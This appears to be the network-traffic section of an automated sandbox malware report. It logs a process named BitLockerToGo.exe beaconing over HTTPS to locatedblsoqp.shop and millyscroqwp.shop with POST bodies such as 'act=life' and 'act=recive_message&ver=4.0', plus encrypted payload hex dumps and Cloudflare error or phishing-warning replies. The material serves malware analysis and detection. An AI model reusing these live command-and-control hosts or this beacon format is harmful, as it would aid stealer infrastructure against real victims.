2024-09-03 15:14:06 UTC	620	IN	Data Raw: 45 31 03 50 94 b9 7c 34 79 f5 1c 13 f2 62 fa 7b 98 27 33 0c 6b bd 72 09 3d c9 44 15 14 47 a0 d2 01 12 9b 25 0f 0a 5c 1e 39 17 60 9f 41 df 3e 1a 9f 3a dd 55 11 f9 5b 0b 72 af 28 ce b1 eb dc f5 b4 d3 62 17 87 1f c9 f6 7c ef d2 c0 ed 17 4e 3e aa 48 92 65 cf 43 35 0f da 7d 07 6d 79 23 5c 80 48 94 0a d5 ba a0 9e 7c e8 33 1a 39 d3 b1 a2 40 4d 0e b6 e9 f4 92 93 9b 75 ea 86 1e 5d 5e 6b 28 f1 da f2 a5 76 9a d7 9b ee eb 64 5c d1 8e d8 97 33 93 ab c9 99 09 02 c0 c2 06 ba cd e3 3f ea 0d 38 e9 62 d4 a6 c0 48 b0 7c 42 08 bc 46 a4 72 a9 d8 2f 12 b8 44 ee f9 80 ce a9 4e c9 7f af 80 e9 a7 53 fc 75 ff 77 a4 1a e1 84 5f 1e 30 85 50 b6 88 51 6f eb 00 8f 77 8d d7 79 c9 57 fc 14 55 7b d8 4f 20 95 b5 73 d4 fb 43 ba d5 18 30 a3 0b d2 98 ef a3 11 68 95 67 2d e7 25 18 f7 36 25 a2 Data Ascii: E1P\|4yb{'3kr=DG%\9`A>:U[r(b\|N>HeC5}my#\H\|39@Mu]^k(vd\3?8bH\|BFr/DNSuw_0PQowyWU{O sC0hg-%6%
2024-09-03 15:14:06 UTC	8192	IN	Data Raw: 57 cd 46 7f 15 24 1b bb 10 80 58 c9 ce 09 3c 04 c8 33 b8 35 c1 01 0e b8 88 b8 d0 90 a5 83 57 12 c5 2a 4f d4 99 51 45 70 77 9d 3c e1 d6 e5 50 2a 44 6a 63 86 ea 1b d2 97 35 ca a2 27 ff 97 9b d7 2f bd ac f9 f0 65 4f e8 3e 6d 0d 03 38 ea 86 d0 e6 87 e3 8e cb 56 d5 18 1f 3c 7b 06 03 17 ea 57 1f 37 9e ce 19 f1 69 ed 49 50 03 e9 f4 e9 92 8b 89 34 20 e6 cf 4e 7d 50 13 02 69 07 5a d2 a2 f5 a8 63 e1 a8 8a 38 cd 18 54 b5 cc bd 98 48 b4 60 8e 09 bc 1c 4a 92 51 c4 f5 4a 1e 32 7c bd cb 2e 73 8e 85 fa 40 af db cf 15 80 3a db f8 00 7a cf e4 ac 10 e1 81 e7 b2 f6 6f 5b 47 f5 d9 f5 da 3f 5a df 9c ec b0 b6 ef 6c 39 33 0e 50 ce f1 77 59 7c b0 d5 91 19 f6 13 6b bb f8 7c 04 42 92 18 dd c1 4b 85 65 a2 30 c6 bb ac 7a 19 d7 3a 47 4d 45 a9 9b a0 3a 15 2d 52 74 ef 7d c4 35 af 6d d9 Data Ascii: WF$X<35WOQEpw<PDjc5'/eO>m8V<{W7iIP4 N}PiZc8TH`JQJ2\|.s@:zo[G?Zl93PwY\|k\|BKe0z:GME:-Rt}5m
2024-09-03 15:14:06 UTC	7188	IN	Data Raw: 25 0b d8 0a a2 5b 4d c0 9a 5b 50 cf 62 8b 84 d4 96 38 c5 2c f2 d6 8f 87 83 d4 53 43 d4 fa f9 a7 32 93 d8 df 7d a7 6d de 97 a4 9a ec 7b b3 60 7c 94 64 c6 c9 37 d7 ec 7e 3c 40 c5 a1 08 6f b1 d4 d8 70 90 cf 70 e7 fe c8 cf a9 d9 40 ee 46 4a ee 18 85 9d 16 8d 54 f1 73 bb c1 e1 41 df ac ce 76 6c 1b 4f bf 72 62 58 f6 7f 3d ca 82 4f f2 b7 fd aa 29 7e 5e 70 fe b2 77 d1 60 ea fa 0a 53 77 30 b4 43 c5 e0 74 62 13 c9 49 e1 47 a9 4d 15 af 67 8a 8f ba da 39 e5 fb b5 35 89 0d e9 4d fb 13 42 30 6e 3a 6a 8c 02 97 e6 8f 61 14 99 14 4c 3b 58 77 89 32 e0 ba 7b 1c 66 69 eb 4e 63 be 34 52 7c 49 fa 1b 47 39 12 aa 8c 56 bd 7d 56 89 fb 82 0e 45 90 e3 3f 75 25 75 6f 7a cb 0f ca 24 41 e2 af 1d 9d 51 fe 6f 36 07 16 57 9c 91 d7 e3 fb f8 cc b5 52 c4 29 4e 18 da f4 7d 73 c6 03 0d ab 13 Data Ascii: %[M[Pb8,SC2}m{`\|d7~<@opp@FJTsAvlOrbX=O)~^pw`Sw0CtbIGMg95MB0n:jaL;Xw2{fiNc4R\|IG9V}VE?u%uoz$AQo6WR)N}s
2024-09-03 15:14:06 UTC	1004	IN	Data Raw: 25 4c 0b d7 58 67 39 08 3b f0 2c c3 56 93 e8 33 82 d0 82 4e dc a1 9f 81 21 81 c6 c6 96 9d d0 e1 9f ff 60 3a 88 f8 d7 c0 fe cf a4 1d d6 5c e2 bd 1c 5c 24 95 40 10 c7 f2 50 95 c4 b1 5c f2 13 80 52 23 be d8 07 8e 06 e7 66 5c ba a1 d7 13 bd de 22 b1 e3 2b 9c 0a eb 6b 09 a7 fc 46 b1 cd d7 ea 78 70 39 32 ae 12 bf e8 84 fa d5 7a ee ec 62 b1 0a 0d 75 18 52 5a 68 86 46 12 15 60 9e 28 f9 4f d9 75 07 be 22 ba f4 58 e8 e2 f6 d7 0b 73 e7 cf b2 ee 67 d1 08 0e bb 67 da 1f 15 17 13 67 63 35 06 af 5d a7 c8 75 5c 53 f2 44 c7 13 2a 50 aa a6 ef e5 79 27 6b 39 5d 76 0d 91 37 02 b7 09 0f a5 36 66 25 9e ad 21 37 bc ff df 7a 1a ce 79 9d 9c da 25 63 d5 4b 73 7f 8e 34 02 28 7a e9 41 88 7a 57 51 71 15 ee 9a d0 93 ec ce a3 38 f9 4d fc 74 51 1c 79 9b fd aa a5 0f 17 f4 da 57 67 a1 82 Data Ascii: %LXg9;,V3N!`:\\$@P\R#f\"+kFxp92zbuRZhF`(Ou"Xsgggc5]u\SD*Py'k9]v76f%!7zy%cKs4(zAzWQq8MtQyWg
2024-09-03 15:14:06 UTC	8192	IN	Data Raw: e2 b1 78 84 22 fc 56 af 90 42 f0 31 8d 8c c7 82 3a 07 9c f2 31 a9 cf 6c ff 7e 87 ce a9 9b 78 e2 d7 80 c4 69 b4 e2 e1 24 79 4a 8f ba 76 5a ba 28 9b 1c 75 81 6b a4 14 df 7f 61 47 da a4 40 48 11 f6 5b d5 f8 39 23 49 ae 90 dc b3 13 33 0e 1c c0 31 c8 5e 48 d3 7a 1f 3c ed e9 6f 92 0f 14 a2 db 27 e0 1c 54 56 34 44 e8 e9 8b 8b 1f 4f 5f 66 bc 74 c5 26 fe d0 eb f2 7b 82 b5 93 d1 a8 ce 1a 9f 84 09 9c 9b 35 28 18 42 c6 82 01 f6 e1 66 25 bc a5 dc c8 e5 96 a9 7d ed cf 9f 49 ba a3 09 58 85 80 7b d0 93 3c 5d 4a bb d3 cc 59 48 cb e2 42 0b 61 d0 40 26 bd 9a ea 33 01 19 9e 3d 30 22 64 d6 39 2f ca 00 9e 1f 32 63 60 f5 76 3d 75 7f 31 4a 76 4e b4 72 ce c2 81 26 f4 62 61 ef e6 1b fd 74 bf d6 46 5a 4e f9 44 09 f9 8e d7 e3 0f 7f 9f ff ae 21 f8 1e 23 b5 a3 7b ad 15 7e d2 b4 10 1b Data Ascii: x"VB1:1l~xi$yJvZ(ukaG@H[9#I31^Hz<o'TV4DO_ft&{5(Bf%}IX{<]JYHBa@&3=0"d9/2c`v=u1JvNr&batFZND!#{~
2024-09-03 15:14:06 UTC	6804	IN	Data Raw: 59 91 74 7e ab e8 9b 2f 38 d4 ce ab 60 fe 8d 7c 1c e5 02 b4 68 66 79 d2 39 86 9b 89 ac ca b5 3c 95 d2 50 6c 18 ed 3c ae 59 85 bd d7 2d 62 79 0d 92 37 19 26 d6 04 63 3b b2 81 bf 54 19 97 b5 b4 7a 52 2e 64 ec 2f 37 f8 14 a4 0d 10 f9 b1 bc 21 d5 61 77 2f a7 e6 b3 fa a2 7f 76 9e de 18 5b cb af db 16 46 03 f9 f3 98 b7 35 c0 18 f6 4b 7e 8d b0 e4 2d bf 47 09 52 e8 3c 7b 3f fe 8a 35 6b 70 bd 1f d4 a4 5c ea ec 35 77 aa 39 90 0b 6b bf 26 69 c7 4a fb 19 96 2f 0b 10 8d fc 9d a5 d2 f7 0a ca ed ed cb 85 6d 20 9b ac f9 d0 40 15 f6 9a c2 4c a0 17 e8 4c bc ed b1 eb fb a3 b2 ea b2 ad d8 5c ed e9 c7 b2 6c 91 b2 33 f3 d8 b7 bf e7 ce 86 3c 92 9e b9 bf 9d 48 71 db eb d2 60 a9 e4 4a a4 34 9f 00 a2 2e 23 26 6c d0 db 43 e1 6a 3c a5 93 9c ff 37 31 31 3f e1 d9 74 4e a0 c7 e3 c9 72 Data Ascii: Yt~/8`\|hfy9<Pl<Y-by7&c;TzR.d/7!aw/v[F5K~-GR<{?5kp\5w9k&iJ/m @LL\l3<Hq`J4.#&lCj<711?tNr
2024-09-03 15:14:06 UTC	1388	IN	Data Raw: 13 71 0c b8 84 1e 11 ef ac ee 5a 27 4f 0b 7e ca 5a d0 51 a8 38 1a 75 c5 6d 64 70 7c 5d ef 80 b7 3b 8b 22 db c0 9c b7 49 19 8f e6 cf 2a 81 fa 56 73 b9 f2 3d 2e 2f 92 09 6e 82 b2 9a ee 8d 4a 36 75 22 78 05 92 33 a2 b0 15 0a 20 6a ac 9e ce 50 2f 06 a6 aa 00 c0 9e 63 a3 73 98 1d 9e e7 76 4a 3d 7e b3 29 c0 9c be fb f8 df 15 e4 6e 1f 1b bf 51 2f 8f 9a 75 97 e0 2f f5 86 07 c4 8a 41 4f df 31 63 7e bd ea 05 b3 a3 d1 43 ba 88 0b 96 54 59 e4 86 60 4b 4e fd 2a da f9 04 cc 50 9c 7c 5c 3a 52 b8 8d c6 c0 18 63 aa 5e 6b 5e 07 99 8d 4e b6 63 0a c3 12 d7 a9 11 b3 88 bb 01 03 76 60 fe e4 24 ca f4 5e c8 51 f8 2c 33 d0 84 e5 0c c8 38 e0 2d f1 b8 0d 65 b2 83 fc 07 00 e6 3d e8 7d aa d8 ae af 8f 80 3b 04 d7 84 84 19 d2 6d be 27 f4 45 f3 a0 c9 f9 a2 75 e5 ba cb e4 73 6b 52 c5 9d Data Ascii: qZ'O~ZQ8umdp\|];"IVs=./nJ6u"x3 jP/csvJ=~)nQ/u/AO1c~CTY`KNP\|\:Rc^k^Ncv`$^Q,38-e=};m'EuskR
2024-09-03 15:14:06 UTC	8192	IN	Data Raw: f7 50 ab 68 c2 59 ee 04 ab 40 36 c7 c8 75 54 e1 45 df cf 56 6e f8 98 42 ad 74 ae 1b 43 5e c9 19 54 0d 99 9c c0 be 63 01 11 5b 5c 86 c5 9d 0a 41 e9 02 31 ee 22 e0 0e 09 a3 7e 1e 1e 57 e2 9c 4a 7d 5c 74 ab 78 1a 47 76 ad 55 41 54 47 8f 0b 17 c7 24 2d df c1 8a 5d c2 36 98 2a 89 58 04 84 7c be 41 59 23 8e 30 52 d9 07 da d4 41 d4 40 e2 25 90 d4 5e 8d 77 56 4e d2 00 15 d3 19 4d 0c f2 9f 20 d3 14 51 43 a6 87 50 8d 5d 56 54 c4 4a a3 d6 63 28 b6 12 cc be 56 46 a7 b9 7d 98 7c f8 b0 8d 15 ac dc fc c0 80 ff 9a 1a 19 f8 98 05 86 5a 58 dc 95 0b 61 4d c0 75 70 03 0a 93 ac d0 95 00 4e ca 0a e0 89 a1 6c da dd b3 51 82 9a 5d 98 db 37 12 60 47 c4 fc 71 1f fd d3 b1 05 c6 82 0e 34 82 51 1b eb 08 70 87 31 86 3c 43 44 75 8a b3 d2 ea 9c 56 9c 49 dd 47 75 00 4f ca 72 34 87 a5 d7 Data Ascii: PhY@6uTEVnBtC^Tc[\A1"~WJ}\txGvUATG$-]6*X\|AY#0RA@%^wVNM QCP]VTJc(VF}\|ZXaMupNlQ]7`Gq4Qp1<CDuVIGuOr4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49801	188.114.96.3	443	1136	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:06 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=6Rwdb5aJ4Jny30AgQFUhhnp2TBdEK.zSVnR_xS0merM-1725376444-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: locatedblsoqp.shop
2024-09-03 15:14:06 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 31 54 4f 35 41 2d 2d 51 58 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=y1TO5A--QX1&j=
2024-09-03 15:14:07 UTC	804	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tq4etrj9ncrlgpot6ggbisml8n; expires=Sat, 28 Dec 2024 09:00:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8z77qPZgTN5hAVMu%2FzVNAG46LjBogoGdvmBQnrLDZ6QzdS2gJYoMHmNYGyfAXc7tcrRYq8nN%2FTybpxi%2F%2FiBwdxEjcgB8tZmnkPgI2LHtYRdY2HVjzCTcEJGrSwTHFUl5VWFYDU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6b0084bbf80d6-EWR alt-svc: h3=":443"; ma=86400
2024-09-03 15:14:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-03 15:14:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49822	188.114.97.3	443	4920	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:16 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: millyscroqwp.shop
2024-09-03 15:14:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-03 15:14:16 UTC	808	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f6tr7hnhmntqsrt9lusullvdcl; expires=Sat, 28 Dec 2024 09:00:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xp3Mmi8kXPEkexKT%2FyHLQVIVuZxlaoCmUh4A6wdu%2BMDNXkiA5VZCmK8zBNc4Wk283aIMS%2Bd1cWJLYjvDyfD9Aest%2BwjqcxlH7PtupiZg7ai9vY4U57BZMk2rZIgrmh%2FGI8XNrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6b042d8904295-EWR alt-svc: h3=":443"; ma=86400
2024-09-03 15:14:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-03 15:14:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49830	188.114.96.3	443	4920	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:18 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: locatedblsoqp.shop
2024-09-03 15:14:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-03 15:14:18 UTC	551	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=akLKU0LMORl1Uwbccs6jePuoAOjTfKyFT9Wt7GLh7ng7AP8R%2BTxJDczYJqXYQxRhd%2FOoY8op0SjnJ1yecG1EbebYe2G%2BvPDGC2KGyoqJeFMtdGupoIL0Vqv4VP0r96rUTMMUEr0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6b0521d877ce7-EWR
2024-09-03 15:14:18 UTC	818	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-03 15:14:18 UTC	1369	IN	Data Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
2024-09-03 15:14:18 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 73 42 4f 72 32 5f 5f 4a 76 4a 77 35 48 6d 75 65 59 41 50 4f 62 43 38 78 6e 7a 30 68 69 47 5f 38 45 6f 59 66 4b 34 73 62 5f 49 77 2d 31 37 32 35 33 37 36 34 35 38 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 Data Ascii: <input type="hidden" name="atok" value="sBOr2__JvJw5HmueYAPObC8xnz0hiG_8EoYfK4sb_Iw-1725376458-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
2024-09-03 15:14:18 UTC	849	IN	Data Raw: 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 Data Ascii: m:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
2024-09-03 15:14:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.8	49841	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:22 UTC	355	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=sBOr2__JvJw5HmueYAPObC8xnz0hiG_8EoYfK4sb_Iw-1725376458-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: locatedblsoqp.shop
2024-09-03 15:14:22 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 31 54 4f 35 41 2d 2d 51 58 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=y1TO5A--QX1&j=
2024-09-03 15:14:23 UTC	804	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8meiaedi0fvhhimmdceg87vq45; expires=Sat, 28 Dec 2024 09:01:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2BM3wWG9xDzqgf8ZpXQB23ia%2FhyFpthEri94KKJnokYtwqmx0gWaCZNtOWvP20JelatcHvQXbyLch2u%2BMNHB2zoRXFotw3sLKOloT5gfPvsC6zSNOnelg0WAVYdAVm%2Fttxh8Qk8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6b06c7fc843a3-EWR alt-svc: h3=":443"; ma=86400
2024-09-03 15:14:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-03 15:14:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.8	49851	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:35 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: millyscroqwp.shop
2024-09-03 15:14:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-03 15:14:36 UTC	812	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9fq0fr87ttaig1inl9pma4h9vg; expires=Sat, 28 Dec 2024 09:01:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKPFL6w%2BW6xEx%2FxuB6yLgCXXsYglqUaDxrXQGLyChfWhZlCLtMD8goMhewHDl5p%2F%2Bl1uZixS%2FkiatK90hEmHJDmzPJpgfImYkN55gBrmtU%2BxiLre%2BlqdSTsivCEh3kdrhAJdxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6b0bdcf0b43a1-EWR alt-svc: h3=":443"; ma=86400
2024-09-03 15:14:36 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-03 15:14:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.8	49852	188.114.96.3	443

Timestamp	Bytes transferred	Direction	Data
2024-09-03 15:14:36 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: locatedblsoqp.shop
2024-09-03 15:14:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-03 15:14:37 UTC	553	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:14:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2F4lTq08E50TOWq921axaJnhDqigP1Zu1tNoLmvCJAHqC2Odd9%2BG8WEMWcZtC%2Fn7qz9VQBtWmcUxDXVcyER1M1HFbW0YPNtle52Uq6GW3PcOhP87eiJLHQMj66TDMBoutijB%2F20%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bd6b0c588330c82-EWR
